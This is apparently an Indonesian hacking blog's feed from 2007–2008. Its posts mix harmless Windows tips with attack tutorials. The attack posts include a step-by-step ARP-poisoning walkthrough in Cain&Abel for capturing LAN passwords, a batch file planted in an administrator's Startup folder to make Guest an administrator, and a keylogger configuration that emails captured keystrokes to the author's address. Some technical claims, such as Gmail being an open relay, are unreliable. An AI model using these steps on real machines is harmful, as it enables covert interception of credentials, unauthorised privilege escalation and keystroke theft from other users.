Salah satu cara yang bisa dilakukan untuk menghilangkan jejak atau menjaga identitas yaitu dengan menggunakan anonymous proxy. Hal ini mungkin akan menjadi topik yang basi bagi beberapa orang, tapi bagi orang-orang yang belum mengetahuinya, sepertinya akan menjadi informasi yang dapat dipraktekkan.

Yang akan saya bahas ialah bagaiamana menggunakan anonymous proxy pada 3 mesin browser yang umum digunakan.

Untuk mendapatkan alamat proxy, silahkan hubungi paman google!

1. Opera

Pada menu Opera, pilih ToolsPreference

Setelah itu pilih tab Advanced dan klik menu Network di side bar sebelah kiri.

Pilih Proxy Server dan masukan alamat proxy beserta Port nya.

Klik Ok.

2. Internet Explorer
Pada menu bar IE pilih ToolsInternet Options

kemudian pilih Connections dan lanjutkan ke LAN Settings

Klik Advanced seperti pada gambar dibawah ini

Setelah itu lanjutkan dengan mengisi form proxy dan port

3. Firefox

pada menu bar, klik ToolsOptions

klik Advanced kemudian pada bagian Network klik Settings, akan muncul sebuah dialog. Pilihlah Manual Proxy Configuration dan isi form proxy beserta port nya

Efek dari penggunaan proxy ini ialah koneksi akan menjadi lebih lambat dari biasanya.

Recover Pass ZIP and RAR

noreply@blogger.com (BlackSignal) — Fri, 14 Mar 2008 08:54:00 +0000

Keberadaan aplikasi kompresi seperti Winzip dan WinRAR memang cukup membantu, terutama bagi yang memiliki kapasitas disk yang tidak terlalu besar. Zip dan RAR juga memiliki fasilitas proteksi berupa password yang akan melindungi file Anda saat akan di eksekusi ataupun di ekstrak oleh orang yang tidak berhak.

Walaupun demikian, kadang proteksi seperti ini bisa menjadi bumerang, saat kita lupa akan password yang digunakan sehingga file tersebut jadi nganggur.

Sebenarnya banyak sekali tool yang bisa digunakan untuk merecover password zip dan RAR. Tapi kali ini yang akan kita bahas hanya ZIP Password Finder dan RAR password Recovery.

1. ZIP Password Finder

Download aplikasi nya di http://www.astonsoft.com/ atau Anda bisa menyedot langsung dari

http://rapidshare.com/files/98958335/Zip_Recovery_pass.zip

Setelah Anda mendownload, Install program tersebut dan jalankan.
Tampilan awalnya seperti ini:

kemudian klik open file

kemudian pilihlah file yang akan anda cari password nya

Setelah itu klik Start

Proses ini mungkin membutuhkan waktu yang cukup lama. Sementara menunggu Anda bisa mengerjakan hal lainnya

2. RAR password Recovery

Silahkan download program nya di :

http://rapidshare.com/files/98958334/RAR_Recovery_pass.rar

kemudian install program tersebut dan jalankan

tampilan awalnya seperti ini:

klik open untuk browsing file yang akan Anda cari passwordnya

pilihlah file yang Anda maksud

karena ini versi Trial, klik lah I want to try RAR Password Recovery before I buy it

kemudian klik start

Setelah selesai prcessing akan muncul hasilnya

Dalam contoh ini password yang diperoleh ialah ibm

Modifikasi System Informasi Properties

noreply@blogger.com (BlackSignal) — Mon, 10 Mar 2008 06:23:00 +0000

Pernahkan Anda Memperhatikan System Informasi Properties (Contol Panel/System/System Properti)? Yang terlihat hanya informasi tentang OS dan Service Pack, kan?
Tapi jangan khawatir karena sekarang saya akan membahas tentang bagaimana caranya memodifikasi semua itu.
caranya: buka notepad...

Copy
Script Di Bawah ini

[General]
Manufacturer=CordWeapon
Model=BlackSignal
[Suport Information]
Line1=Bagi pengguna kompy ini
Line2=Tolong jangan ubah Setting apapun
Line3=Maaf ya...
Line4=Ini demi kebaikan bersama

simpan dengan dengan nama oeminfo.ini kemudian simpan di
c:\windows\system =====> untuk windows 95/98
c:\winnt\system32 =====> untuk windows NT
c:\windows\system32 ===> untuk windows XP

kemuadian untuk memberikan image pada kotak informasi tadi, caranya:
siapkan gambar dengan format .bmp dan ukurannya 180x114 pixel. Ingat...format nya harus bmp, jika anda mempunya gambar dengan format lain, silahkan konversikan dulu menggunakan image editor kesukaan Anda.
Setelah itu simpan dengan nama oemlogo.bmp dan letakan di tempat tadi (tempat Anda menyimpan file oeminfo.ini)

Selamat Mencoba

Menyembunyikan Folder Options

noreply@blogger.com (BlackSignal) — Fri, 25 Jan 2008 13:31:00 +0000

Ada dua cara untuk menyembunyikan folder option dari menu win exolore, yang pertama dengan merubah setting pada system registry dan yang kedua dengan menggunakan bantuan gpedit console. Kali ini saya akan membahas bagaimana cara menyembunyikan folder options dengan metode yang kedua.
Hal yang harus dilakukan:
1. buka windows explorer
2. c:\windows\system32
3. double klik gpedit yang berekstesi microsoft common console
4. local computer policy\user configuration\administrative templates\windows components\windows explorer
5. pilih option “Remove the Folder Options menu item from the Tools menu”
6. akan muncul sebuah dialog, pilih “enable” pada tab setting
Klik Apply, Ok

Sniffing dengan Cain&Abel

noreply@blogger.com (BlackSignal) — Sat, 19 Jan 2008 08:06:00 +0000

Sebelum kita membahas tentang bagaimana cara melakukan aksi sniffing dalam sebuah jaringan LAN, ada baiknya kita mengetahui apa yang dimaksud dengan sniffing.
Sniffing adalah sebuah aksi penyadapan. Melihat cara yang digunakan, sniffing dibagi kedalan dua kategori; passive sniffing yaitu melakukan penyadapan tanpa merubah data atau packet apapun dari jaringan sedangkan active sniffing merubah packet di jaringan atau mengirimkan packet dengan alamat MAC yang berubah-ubah secara acak dalam jumlah yang sangat banyak. Active sniffing biasanya menggunakan tool tambahan (yang biasa digunakan yaitu Etherflood), tapi kali ini kita hanya akan membahas bagaimana cara menggunakan passive sniffing dan tool yang kita gunakan adalah Cain&Abel.
Cain&Abel merupakan sebuah tool yang sangat popular dan cara penggunaannyapun sangat sederhana, untuk sedot Cain&Abel bisa diambil pada topik TOOLS.
Langkah-langkah yang harus dilakukan:
1. Install program Cain&Abel
2. Jalankan Cain
3. Untuk melakukan aksi sniffing, klik sub-tab Sniffer
4. Klik sub-tab APR
5. Klik menu Configure – akan muncul configure dialog yang berisi tentang beberapa sub-tab configuration – klik tab Sniffer – akan tampak beberapa keterangan tentang Adapter, IP Address dll – klik satu baris di bawah menu-menu tadi yang berisi keterangan IP Address komputer kita, MAC dll – kemudian OK.
6. Active kan Cain dengan mengklik tombol Start
7. Agar komputer kita memiliki kemampuan routing, klik tombol Start APR
8. Jalankan Command Prompt
9. Lakukan komunikasi dengan komputer target dengan melakukan pinging terhadap IP Address komputer target, contoh c:\ping 192.168.0.2, dalam beberapa kasus kita harus melakukan pinging (menurut pengalaman saya, pinging merupakan cara tercepat untuk melakukan komunikasi dengan komputer target) lebih dari satu komputer, hal itu bertujuan untuk menjadikan komputer lain sebagai gateway.
10. Pada Cain ada dua bagian tabel yang bermenu sama Status, IP Address, MAC Address dll. Untuk memulai, klik tabel bagian atas (router area), kemudian klik tanda plus (Add to list)
11. Akan muncul dialog New ARP Poison Routing. Klik IP Address komputer target yang ada di kolom sebelah kiri dan klik IP Address komputer gateway pada kolom sebelah kanan. Klik OK
Setelah IP Address masuk ke dalam list, kita tinggal menunggu lalu lintas packet yang tertangkap oleh Cain. Untuk mengetahui hasil yang tertangkap, klik tab passwords.

- Cara kerja dari Cain:
Cain&Abel meracuni ARP tabel komputer target sehingga komunikasi antara komputer target dengan gateway harus melalui komputer kita.

- Masalah yang sering ditemukan:
Cain&Abel sering teridentifikasi sebagai virus oleh antivirus, hal ini dikarenakan antivirus menggunakan fasilitas heuristic yaitu menebak-nebak sebuah file sebagai virus, fungsi ini bertujuan untuk mengenali virus-virus baru yang belum terdeteksi oleh database antivirus. Namun fasilitas ini terkadang menjadi “false warning” dan menganggap program-program tertentu terutama hack tools sebagai virus, bahkan antivirus lain pun dianggap virus.

- Bagaimana mencegah aksi snifing ini:
Untuk mencegah aksi ini, lakukan perubahan pada ARP, dalam hal ini type dari ARP yang akan kita ganti dari dynamic menjadi static. Caranya : c:\arp –s [IP Address] [MAC Address] dan untuk mengembalikan ke keadaan semula, ganti atribut –s menjadi -d

Thanks to :
S'to Jasakom
hyp3rl1nk

TOOLS

noreply@blogger.com (BlackSignal) — Sat, 15 Dec 2007 14:35:00 +0000

Dari Guest Jadi Admin pada Win XP

noreply@blogger.com (BlackSignal) — Mon, 19 Nov 2007 20:16:00 +0000

Pada windows XP atau 2000, seorang user Guest dapat merampas posisi Administrator untuk kemudian diduduki.

caranya:
tulis script di bawah ini..."pake notepad aja biar gampang"

@echo off
net localgroup Administrator Guest/Add
Exit

kemudian simpan file tersebut (nama file terserah) dengan ekstensi BAT. Contoh: desktops.bat , ingat yang penting ekstensi file harus BAT.

Lalu simpan file tersebut di C:\Documents and Settings\"AdminName"\Start Menu\Programs\Startup

Untuk menjalankan program tsb, restart kompy anda.

Mengoptimalkan Windows XP

noreply@blogger.com (BlackSignal) — Sun, 18 Nov 2007 11:10:00 +0000

Saat ini windows XP cukup diminati, itu diakrenakan XP menawarkan banyak sekali fitur yang tidak dimiliki oleh varian-varian sebelumnya. Namun demikian, keterbatasan hardware kerap kali menjadi kendala. Dalam hal ini, lambatnya kinerja computer.
Ada dua cara untuk men-tune up computer agar kinerjanya lebih optimal. Yang pertama dengan mengubah setting registry dan yang kedua dengan melakukan setting pada menu-menu yang memang telah disediakan oleh XP.
Kali ini kita akan membahas mengenai cara men-tune up dengan menggunakan metode yang kedua .

Optimalkan memori

- Matikan Indexing Services
Fitur ini berfungsi untuk mempercepat proses pencarian file atau folder yang tersimpan dalam kompy. Program ini cukup banyak memakan memori. Untuk mematikannya, bukalah windows explorer- klik kanan pada harddrive (c:) - properties - pada bagian bawah windows akan terlihat “Allow Indexing Services to index this for faster searches” - hilangkan checklist pada opsi ini kemudian klik Ok. Akan muncul :confirm attribute changes” pilihlah Apply changes to c:\ subfolders and file - OK.

- Optimalkan Pagefile
Pagefile adalah bagian kapasitas harddisk yang dicadangkan sebagai perpanjangan dari RAM sehingga seolah-olah computer mempunyai memori yang lebih besar dari RAM sesungguhnya.
Sebagai patokan : jika RAM dibawah 512 makan 1,5 X RAM tapi jika RAM 512 atau lebih makan 1 X RAM.
Untuk mengubah setting ini: Explorer - klik kanan pada My Computer - Properties - Advanced - pada bagian Performance klik Settings. Akan muncul dialog box Performance Options - Advanced - Change. Kemuadian muncul dialog Virtual memory. Pilih C: (drive yang berisikan pagefile). Samakan initial size dengan max size dengan patokan diatas. Kemudian klik Set - Ok - Ok -Ok. Jika computer meminta restart, maka restart lah.

- Matikan Port nganggur
Untuk mempercepat booting, matikan port yang tidak terpakai. Caranya: control panel - System - Hardware - Device Manager - Ports - klik kanan pada port yang akan dimatikan - Disable - Yes.

Optimalkan Harddisk

- Gunakan mode DMA
Direct Memory Access Mode yaitu alternative atau bias dikatakan regenerasi dari PIO (Programmed Input/Output). DMA melakukan transfer data dari harddisk langsung ke memori sehingga prosesor bias berjalan lebih cepat. Untuk mengaktifkan mode DMA: Kontrol Panel - System - Hardware - Device Manager - klik ganda pada IDE ATA/ATAPI Controllers - klik kanan Primary IDE Channel - Properties
Advanced Settings - pada transfer mode pilih DMA if available-Ok -restart computer anda.

- Hapus isi folder windows prefetch
Folder prefetch berisi file rujukan dari program yang sering digunakan supaya saat kita mejalankan program tersebut akan lebih cepat mucul. Tapi jika file yang tersimpan dalam folder ini terlalu banyak justru akan membuat computer jadi lambat. Untuk menghapusnya : C:\WINDOWS\Prefetch

- Buang file hibernasi
File ini akan berguna bagi pengguna laptop karena file hibernasi akan menyimpan semua hal yang sedang dijalankan dan menyelamatkan segala yang sedang kita kerjakan ketika baterai mulai kehabisan daya. Tapi jika anda pengguna PC hal ini tidak bermanfaat karena kompy ana akan selalu terhubung ke l istrik. File ini memakan ruang sama dengan besaran RAM. Untuk menghapus file ini:
Control Panel - Power Options - pilih tab Hibernate - uncheck pada opsi Enable Hibernation -Ok.

- Kurangi ukuran Recycle Bin
File yang kita hapus akan tersimpan di Recycle Bin dengan tujuan agar sewaktu-waktu dapat kita kembalikan (restore). Secara default, Recycle Bin menghabiskan ruang 10% dari kapasitas harddisk. Untuk menguranginya, klik kanan pada Recycle Bin - Properties - pada tab Global akan terlihat Maximum size of recycle bin. Jika harddisk anda cukup besar, bisa disetting menjadi 3% tapi jika tidak, gunakanlah 5% - Apply.

Tips lain: Jangan gunakan wallpaper, matikan update otomatis, hapus file dan program yang tidak terpakai, gunakan clean up dan defrag lah computer secara regular.

Catatan: Jika anda membutuhkan fitur-fitur diatas, maka biarkan ia tetap pada tempatnya..!!

File doc Jadi EXE

noreply@blogger.com (BlackSignal) — Thu, 08 Nov 2007 14:53:00 +0000

Bagi anda yang memiliki kompy dengan jam terbang tinggi, sering keluar masuk data apalagi data itu berasal dari compy public seperti warnet atau rental lainnya, kecenderungan untuk terinfeksi virus sangatlah besar.

Salah satu virus yang nyebelin (biasanya berasal dari rental) ialah kspoold. Virus ini mungkin tidak terlalu berbahaya karena ia tidak merusak system, tapi mengurangi kinerja compy cukup membuat kita BT…

Dia menyerang file-file yang berekstensi doc dan merubahnya menjadi exe (application). Berhubung dia hanya merubah ekstensi file, banyak yang tidak menyadari kehadiran virus ini karena file yang terinfeksi virus sekalipun masih dapat dibuka.

Lantas, bagaimana cara membasmi virus ini? Gunakan antivirus AVG!!! (saya pernah mencoba dengan antivir tapi tidak berhasil). Tapi sebelum scanning menggunakan AVG, ada langkah yang harus dilakukan untuk menyelamatkan data anda…”jika anda belum mempunyai backup), karena AVG akan menghapus file yang kedapatan bervirus.

Caranya, bukalah file yang terinfeksi kemudian simpan (save as) dengan format “RTF “ (Rich Text Format) kemudian barulah di scan.

KEYMAIL

noreply@blogger.com (BlackSignal) — Sat, 03 Nov 2007 05:51:00 +0000

Pada tulisan sebelumnya saya sudah membahas tentang Keylogger, kali ini saya akan mengulas tentang Keymail “salah satu aplikasi keylogger” yang dibuat dengan bahasa pemrograman C. kelebihan keymail ini selain penanamannya yang fleksibel juga dapat mengirimkan hasil tangkapannya melalui email, walaupun tidak semua email dapat digunakan.
Untuk mencari SMTP yang Open Relay, dapat menggunakan perintah nslookup –querytype=mx mailserver contoh C:\> nslookup –querytype=mx gmail.com (disini saya menggunakan gmail yang memang open relay). Kita membutuhkan ini untuk konfigurasi.
Perhatikan potongan script dibawah ini:
#define cmailserver “gsmtp163.google.com”
#define cemailto “black.signal7@gmail.com”
#define cemailfrom “black.signal7@gmail.com”
#define LongLength 100
#define FileName “sound.wav”
#define SMTPlog “ring.wav”
#define cemailSubject “Hasil”
Script utuh bisa didapatkan di wesite www.irongeek.com , disana diterangkan juga langkah-langkah yang harus dilakukan dan compailer yang dibutuhkan.
Selamat Mencoba

PORT NUMBER

noreply@blogger.com (BlackSignal) — Thu, 01 Nov 2007 09:31:00 +0000

Decimal Descript
1 ............................ ... TCP Port Service Multiplexer
2 ............................ ... Management Utility
3 ............................ ... Compression Process
5 ............................ ... Remote Job Entry
11 .......................... ... Active Users
13 .......................... ... Daytime
17 .......................... ... Quote of Day
18 .......................... ... Message Send Protocol
19 .......................... ... Character Generator
20 .......................... ... File Transfer (Data)
21 .......................... ... File Transfer (Control)
22 .......................... ... SSH Remote Login Protocol
23 .......................... ... Telnet
24 .......................... ... Private Mail System
25 .......................... ... Simple Mail Transfer Protocol (SMTP)
29 .......................... ... MSG ICP
31 .......................... ... MSG Authentication
33 .......................... ... Display Support Protocol
35 .......................... ... Private printer Server
37 .......................... ... Time
38 .......................... ... Route Access Protocol
39 ......................... ... Resource Location Protocol
42 .......................... ... Host Name Server
43 .......................... ... Who is
45 .......................... ... Message Processing Module
48 .......................... ... Digital Audit Daemon
49 .......................... ... Login Host Protocol
50 .......................... ... Remote Mail Checking Protocol
51 .......................... ... IMP Logical Address Maintenance
52 .......................... ... XNS Time Protocol
53 .......................... ... Domain Name Server
57 .......................... ... Private Terminal Access
59 .......................... ... Private File Service
63 .......................... ... Who Is++
66 .......................... ... Oracle SQL*NET
67 .......................... ... Bootstrap Protocol Server
68 .......................... ... Bootstrap Protocol Client
69 .......................... ... Trivial File Transfer
70 .......................... ... Gopher
71 – 74 .................. ... Remote Job Service
75 .......................... ... Private Dial Out Service
79 .......................... ... Finger
80 .......................... ... Word Wide Web HTTP
81 .......................... ... HOSTS2 Name Server
84 .......................... ... Common Trace Facility
87 .......................... ... Private Terminal Link
88 .......................... ... Karberos
89 .......................... ... SU/MIT Telnet Gateway
92 .......................... ... Network Printing Protocol
93 .......................... ... Device Control Protocol
99 .......................... ... Metagram Relay
101 ........................ ... NIC Host Name Server
103 ........................ ... Genesis Point-to-Point Trans Net
105 ........................ ... CCSO Name Server Protocol
107 ........................ ... Remote Telnet Service
108 ........................ ... SNA Gateway Access Server
111 ........................ ... SUN Remote Procedure Call
112 ........................ ... MclDAS Data Transmission Protocol
113 ........................ ... Authentication Service (Ident)
115 ........................ ... Simple File Transfer Protocol
117 ........................ ... UUCP Path Service
118 ........................ ... SQL Service
119 ........................ ... Network News Transfer Protocol (NNTP)
123 ........................ ... Network Time Protocol
125 ........................ ... Locus PC-Interface Net Map Server
126 ........................ ... Unisys Unitary Login
127 ........................ ... Locus PC-Interface Conn Server
129 ............................ Password Generator Protocol
130 ............................ Cisco FNATIVE
132 ............................ Cisco SYSMAINT
133 ............................ Statistic Service
134 ............................ INDRES-NET Service
135 ............................ DCE Endpoint Resolution
137 ............................ NETBIOS Naming Service
138 ............................ NETBIOS Datagram Service
139 ............................ NETBIOS Session Service
143 ........................ Internet Message Access Protocol
159 ........................ NSS-Routing
160 ............................ AGMP-TRAPS
161 ............................ SNMP
162 ........................ SNMPTRAP
169 ........................ Send
170 ........................ Network PostScript
177 ............................ X Display Manager Control Protocol
178 ............................ NextStep Window Server
194 ............................ Internet Relay Chat Protocol
204 ............................ Apple Talk Echo
218 ............................ Netix Message Posting Protocol
220 ........................ Interactive Mail Access Protocol v3
260 ............................ Openport
280 ........................ HTTP-MGMT
282 ........................ Cable Port A/X
406 ........................ Interactive Mail Support Protocol
443 ........................ HTTP Protocol Over TLS/SSL
470 ........................ SCX-Proxy
488 ........................ GSS-HTTP
489 ........................ Nest-Protocol
520 ........................ Router
521 ........................ Rping
531 ........................ Chat
551 ........................ CyberCash
586 ........................ Password Change
592 ............................ Eudora Set
593 ........................ HTTP RPC EP Map
614 ........................ SSLshell
615 ........................ Internet Configuration Manager
648 ........................ Registry Registar Protocol (RRP)
652 ........................ HELLO_PORT
989 ........................ FTP Protocol, Data, Over TLS/SSL
990 ........................ FTP Protocol, Control, Over TLS/SSL
992 ........................ Telnet Protocol Over TLS/SSL
993 ........................ IMAP4 Protocol Over TLS/SSL
994 ............................ IRC Protocol Over TLS/SSL
995 ........................ POP3 Protocol Over TLS/SSL
1036 ...................... RADAR Service Protocol
1052 ...................... Dynamic DNS Tools (DDT)
1053 ...................... Remote Assistant
1080 .......................... SOCKS
1110 ...................... Cluster Status Info
1112 ...................... Intelligent Communication Protocol
1278 – 1279 .............. DELL Web Admin
1296 ...................... Dproxy
1297 ...................... SDProxy
1333 ...................... Password Policy
1336 ...................... Instant Service Chat
1393 ...................... Network Log Server
1394 ...................... Network Log Client
2303 ...................... Proxy Gateway
2311 ...................... Message Service
2450 ...................... Netadmin
2451 ...................... Netchat
2452 ...................... Snifferclient
2533 ...................... SnifferServer
2784 ...................... Word Wide Web – Development
2860 – 2861 .............. Dialpad Voice 1 – 2
2987 ...................... Indentify
5600 ...................... Enterprise Security Manager
5601 ...................... Enterprise Security Agent
6665 – 6669 .......... IRCU
7777 ...................... CBT
7779 ...................... VSTAT
8008 ...................... HTTP Alternate
8080 ...................... HTTP Alternate
49151 .................... IANA Reserved